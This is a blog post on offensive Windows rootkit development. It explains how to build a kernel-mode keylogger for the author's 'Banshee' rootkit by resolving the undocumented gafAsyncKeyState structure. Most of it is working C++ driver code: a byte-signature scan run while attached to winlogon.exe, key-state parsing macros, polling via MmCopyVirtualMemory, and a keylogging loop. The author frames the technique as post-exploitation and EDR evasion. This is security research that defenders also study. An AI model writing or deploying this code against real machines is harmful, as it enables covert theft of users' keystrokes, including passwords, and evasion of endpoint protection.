Keylogging in the Windows kernel with undocumented data structures

If you are into rootkits and offensive Windows kernel driver development, you have probably watched the talk Close Encounters of the Advanced Persistent Kind: Leveraging Rootkits for Post-Exploitation by Valentina Palmiotti (@chompie1337) and Ruben Boonen (@FuzzySec), in which they discuss using rootkits for offensive operations. I do believe that rootkits are the future of post-exploitation and EDR evasion: EDR is getting tougher to evade in userland, and Windows drivers are full of vulnerabilities that can be exploited to deploy rootkits. One part of this talk, however, particularly caught my interest: around the 16-minute mark, Valentina talks about kernel-mode keylogging. She describes the abstract process of how they achieve this in their rootkit as follows:

The basic idea revolves around gafAsyncKeyState (gaf = global af?), which is an undocumented kernel structure in win32kbase.sys used by NtUserGetAsyncKeyState (this structure exists up to Windows 10 – more on that at the end or in the talk linked above).

By first locating and then parsing this structure, we can read keystrokes the way that NtUserGetAsyncKeyState does, without calling any APIs at all.

As always, game cheaters have been ahead of the curve, since they have been battling in the kernel with anticheats for a long time. One thread explaining this technique dates back to 2019 for example.

In the talk, they also suggest mapping this memory to a usermode virtual address and then polling it from a usermode process. I roughly implemented their approach but skipped the memory mapping part, since in my rootkit Banshee I might (for now) as well read from the kernel directly. In this short post I want to give an idea of how I approached the implementation, using the talk as a guideline.

Implementation

The first challenge is of course to locate gafAsyncKeyState. Since the offset of gafAsyncKeyState relative to the base address of win32kbase.sys differs across versions of Windows, we have to resolve it dynamically. One common technique is to look for a function that accesses it, find the instruction that does so, and then read the target address out of that instruction's operand.

Signature scanning

We know that NtUserGetAsyncKeyState needs to access this array. We can verify this by looking at the disassembly of NtUserGetAsyncKeyState in IDA, where a reference to our target structure shows up as the operand of a MOV rax, qword ptr [...] instruction.

This is the first MOV rax, qword ptr [...] from the beginning of the function, so we can locate it by simply scanning for the first occurrence of the bytes corresponding to that instruction (starting from the function's beginning) and reading the offset from the operand.

This MOV rax, qword ptr [rip+offset] instruction is encoded in bytes as follows:

48 8B 05 <32bit offset>

So if we find that pattern and extract the offset, we can calculate the address of our target structure gafAsyncKeyState.
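
The address arithmetic behind this pattern can be tried on a plain byte buffer, without touching a kernel. The following is a minimal usermode sketch, not code from Banshee: the function name ResolveRipRelativeMov and the base parameter (the address at which the buffer is assumed to be mapped) are made up for illustration, and a little-endian x64 host is assumed. The key point is that the 32-bit operand is a signed displacement relative to the address of the next instruction, i.e. the address just past the 7 instruction bytes.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Scans `code` for the first 48 8B 05 <disp32> pattern and resolves the
// RIP-relative target address. `base` is the (hypothetical) virtual address
// at which `code` is mapped. Returns 0 if the pattern is not found.
std::uint64_t ResolveRipRelativeMov(const std::uint8_t* code, std::size_t size, std::uint64_t base)
{
    // The whole instruction is 7 bytes long: 3 opcode bytes + 4 displacement bytes
    for (std::size_t i = 0; i + 7 <= size; ++i)
    {
        if (code[i] == 0x48 && code[i + 1] == 0x8B && code[i + 2] == 0x05)
        {
            // The displacement is signed; memcpy avoids an unaligned read
            std::int32_t disp = 0;
            std::memcpy(&disp, code + i + 3, sizeof(disp));

            // RIP points at the next instruction while this one executes
            const std::uint64_t nextInstruction = base + i + 7;
            return nextInstruction + static_cast<std::int64_t>(disp);
        }
    }
    return 0;
}
```

For a buffer mapped at 0x1000 that contains the instruction at offset 2 with a displacement of 0x10, the next instruction sits at 0x1009 and the resolved target is 0x1019. A negative displacement simply resolves to an address before the instruction, which is why the operand has to be read as a signed value.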

Code for finding such a pattern in C++ is simple. You (and I, lol) should probably write a signature scanning engine, since this is a common task in a rootkit that deals with dynamic offsets, but for now a naive implementation shall suffice. However, there is one more hurdle.

Session driver address space

If we try to access the memory of win32kbase with WinDbg attached to our kernel, we will see that (usually) we are not able to read the memory from that address.

This is because the win32kbase.sys driver is a session driver and operates in session space, a special area of system memory that is only readable from the context of a process running in that session. This makes sense, as keystrokes should be handled differently for every user that has a session connected.

Thus, to access this memory, we will first have to attach to a process running in the target session. In WinDbg, this is possible with the !session command. In our driver, we will have to call KeStackAttachProcess, and afterwards, KeUnstackDetachProcess.

A common process to choose is winlogon.exe, as you can be sure it is always running and attached to a session. Another common choice seems to be csrss.exe, but make sure to choose the right one, as only one of the two commonly running instances runs in a session context.

Putting it all together, here is some simple code to resolve the address of gafAsyncKeyState. Error handling is omitted for brevity, and some functions (e.g. GetSystemRoutineAddress, LOG_MSG or GetPidFromProcessName) are my own implementations, but they should be self-explanatory and trivial to recreate. Otherwise, you can look them up in Banshee:

PVOID Resolve_gafAsyncKeyState()
{
	KAPC_STATE apc;
	PVOID address = 0;
	PEPROCESS targetProc = 0;

	// Resolve winlogon's PID
	UNICODE_STRING processName;
	RtlInitUnicodeString(&processName, L"winlogon.exe");
	HANDLE procId = GetPidFromProcessName(processName); 
	PsLookupProcessByProcessId(procId, &targetProc);
		
	// Get Address of NtUserGetAsyncKeyState
	DWORD64 ntUserGetAsyncKeyState = (DWORD64)GetSystemRoutineAddress(Win32kBase, "NtUserGetAsyncKeyState");

	// Attach to winlogon.exe to enable reading of session space memory
	KeStackAttachProcess(targetProc, &apc);

	// Starting from NtUserGetAsyncKeyState, look for our byte signature
	// (i is declared outside the loop because it is logged after the loop)
	INT i = 0;
	for (; i < 500; ++i)
	{
		if (
		   *(BYTE*)(ntUserGetAsyncKeyState + i)     == 0x48 &&
		   *(BYTE*)(ntUserGetAsyncKeyState + i + 1) == 0x8b &&
		   *(BYTE*)(ntUserGetAsyncKeyState + i + 2) == 0x05
		)
		{
			// MOV rax, qword ptr [rip+disp32] instruction found!
			// The 32bit operand is a signed displacement from the next instruction to the address of gafAsyncKeyState
			INT32 offset = (*(PINT32)(ntUserGetAsyncKeyState + i + 3));
			// Calculate the address: the address of NtUserGetAsyncKeyState + our current offset while scanning + 3 opcode bytes + 4 bytes for the 32bit operand itself + the signed displacement parsed from the operand = our target address
			address = (PVOID)(ntUserGetAsyncKeyState + (i + 3) + 4 + (INT64)offset); 
			break;
		}
	}

	LOG_MSG("Found address to gafAsyncKeyState at offset [NtUserGetAsyncKeyState]+%i: 0x%llx\n", i, address);

	// Detach from the process
	KeUnstackDetachProcess(&apc);
	
	ObDereferenceObject(targetProc);
	return address;
}

With the address of our structure of interest, we now just need to find out how we can parse it.

Parsing keystrokes

When I first started to reverse engineer NtUserGetAsyncKeyState in Ghidra, it occurred to me that folks way smarter than me had already done that, so I looked up the function in ReactOS.

Here, we can see how this function simply accesses the gafAsyncKeyState array with the IS_KEY_DOWN macro, to determine if a key is pressed, according to its Virtual Key-Code.

The IS_KEY_DOWN macro simply checks if the bit corresponding to the virtual key-code is set and returns TRUE if it is. So our structure, gafAsyncKeyState, is simply an array of bits that correspond to the states of our keys. In the ReactOS layout, each key occupies two bits (a "down" bit and a "lock" bit), so the 256 virtual key-codes fit into 64 bytes.
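
To make the bit layout concrete, here is a small usermode sketch that mirrors the arithmetic of the ReactOS macros as constexpr functions. The names KsByte, KsDownBit, KsLockBit and IsKeyDown are hypothetical stand-ins chosen for this example; the layout itself is taken from the ReactOS header, and it is an assumption that a given Windows build uses the same one.

```cpp
#include <cassert>
#include <cstdint>

// Two bits per key: four keys share one byte
constexpr unsigned KsByte(unsigned vk)    { return vk * 2 / 8; }
// Even bit of the key's 2-bit slot: key is currently down
constexpr unsigned KsDownBit(unsigned vk) { return 1u << ((vk % 4) * 2); }
// Odd bit of the key's 2-bit slot: toggle ("lock") state
constexpr unsigned KsLockBit(unsigned vk) { return 1u << ((vk % 4) * 2 + 1); }

inline bool IsKeyDown(const std::uint8_t* ks, unsigned vk)
{
    return (ks[KsByte(vk)] & KsDownBit(vk)) != 0;
}

// Worked example for the 'A' key (virtual key-code 0x41 = 65):
// byte index = 65 * 2 / 8 = 16, slot = 65 % 4 = 1, so bits 2 (down) and 3 (lock)
static_assert(KsByte(0x41) == 16, "A lives in byte 16");
static_assert(KsDownBit(0x41) == 0x04, "down bit of A is bit 2");
static_assert(KsLockBit(0x41) == 0x08, "lock bit of A is bit 3");
// The highest key-code lands in the last byte, hence the 64-byte array
static_assert(KsByte(0xFF) == 63, "256 keys fit into 64 bytes");
```

Setting byte 16 of a zeroed 64-byte buffer to 0x04 therefore makes IsKeyDown report the A key as down, while its neighbours in the same byte (0x40, 0x42, 0x43) remain up.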

All that is left now is to copy and paste these macros and implement some basic polling logic (what key is down, was it down last time, …).


// https://github.com/mirror/reactos/blob/c6d2b35ffc91e09f50dfb214ea58237509329d6b/reactos/win32ss/user/ntuser/input.h#L91
#define GET_KS_BYTE(vk) ((vk) * 2 / 8)
#define GET_KS_DOWN_BIT(vk) (1 << (((vk) % 4)*2))
#define GET_KS_LOCK_BIT(vk) (1 << (((vk) % 4)*2 + 1))
#define IS_KEY_DOWN(ks, vk) (((ks)[GET_KS_BYTE(vk)] & GET_KS_DOWN_BIT(vk)) ? TRUE : FALSE)
#define SET_KEY_DOWN(ks, vk, down) (ks)[GET_KS_BYTE(vk)] = ((down) ? \
                                                            ((ks)[GET_KS_BYTE(vk)] | GET_KS_DOWN_BIT(vk)) : \
                                                            ((ks)[GET_KS_BYTE(vk)] & ~GET_KS_DOWN_BIT(vk)))

UINT8 keyStateMap[64] = { 0 };
UINT8 keyPreviousStateMap[64] = { 0 };
UINT8 keyRecentStateMap[64] = { 0 };

VOID UpdateKeyStateMap(const HANDLE& procId, const PVOID& gafAsyncKeyStateAddr)
{
	// Save the previous state of the keys
	memcpy(keyPreviousStateMap, keyStateMap, 64);

	// Copy over the array into our buffer
	SIZE_T size = 0;
	MmCopyVirtualMemory(
		BeGetEprocessByPid(HandleToULong(procId)),
		gafAsyncKeyStateAddr,
		PsGetCurrentProcess(), 
		&keyStateMap,
		sizeof(UINT8[64]),
		KernelMode,
		&size
	);

	// for each keycode ...
	for (auto vk = 0u; vk < 256; ++vk) 
	{
		// ... if key is down but wasn't previously, set it in the recent-state-map as down
		if (IS_KEY_DOWN(keyStateMap, vk) && !(IS_KEY_DOWN(keyPreviousStateMap, vk)))
		{
			SET_KEY_DOWN(keyRecentStateMap, vk, TRUE);
		}
	}
}

BOOLEAN
WasKeyPressed(UINT8 vk)
{
	// Check if a key was pressed since last polling the key state
	BOOLEAN result = IS_KEY_DOWN(keyRecentStateMap, vk);
	SET_KEY_DOWN(keyRecentStateMap, vk, FALSE);
	return result;
}
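
The press-detection logic above can be exercised in isolation with simulated snapshots. The following usermode sketch is an illustration only: KeyEdgeTracker and its members are hypothetical names, and the 64-byte snapshots are hand-built test data rather than anything read from a real system. It shows that a press is latched on the up-to-down transition and reported exactly once, no matter how long the key is held.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

struct KeyEdgeTracker
{
    std::uint8_t current[64]  = {};  // latest snapshot
    std::uint8_t previous[64] = {};  // snapshot before that
    std::uint8_t recent[64]   = {};  // latched presses, cleared when consumed

    static unsigned Byte(unsigned vk)    { return vk * 2 / 8; }
    static unsigned DownBit(unsigned vk) { return 1u << ((vk % 4) * 2); }
    static bool IsDown(const std::uint8_t* ks, unsigned vk)
    {
        return (ks[Byte(vk)] & DownBit(vk)) != 0;
    }

    // Feed one 64-byte snapshot and latch every key that went from up to down
    void Update(const std::uint8_t* snapshot)
    {
        std::memcpy(previous, current, sizeof(current));
        std::memcpy(current, snapshot, sizeof(current));
        for (unsigned vk = 0; vk < 256; ++vk)
        {
            if (IsDown(current, vk) && !IsDown(previous, vk))
            {
                recent[Byte(vk)] |= static_cast<std::uint8_t>(DownBit(vk));
            }
        }
    }

    // Report a latched press once, then clear it
    bool WasPressed(unsigned vk)
    {
        const bool result = IsDown(recent, vk);
        recent[Byte(vk)] &= static_cast<std::uint8_t>(~DownBit(vk));
        return result;
    }
};
```

One consequence of this design is that the polling interval bounds what can be observed: a key that is pressed and released entirely between two snapshots never shows up as down and is therefore missed.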

Then, we can call WasKeyPressed at a regular interval to poll for keystrokes and process them in any way we like:

#define VK_A 0x41

VOID KeyLoggerFunction()
{
	while (true)
	{
		// procId and gafAsyncKeyStateAddr are assumed to have been resolved beforehand
		UpdateKeyStateMap(procId, gafAsyncKeyStateAddr);

		// POC: just check if A is pressed
		if (WasKeyPressed(VK_A))
		{
			LOG_MSG("A pressed\n");
		}

		// Sleep for 0.1 seconds
		LARGE_INTEGER interval;
		interval.QuadPart = -1 * (LONGLONG)100 * 10000; 
		KeDelayExecutionThread(KernelMode, FALSE, &interval);
	}
}

Logging a keystroke to the kernel debug log works as a simple PoC for the technique – whenever the A key is pressed, we get a debug log in WinDbg.

You can read the messy code at https://github.com/eversinc33/Banshee.

Some more things to do or look out for are:

Implement it for Windows 11 and later: the structure is the same, it is just named differently and needs to be dereferenced a few times to reach the array
If you are interested, go with the approach mentioned by Valentina and map the structure into usermode to read it from there

Happy Hacking!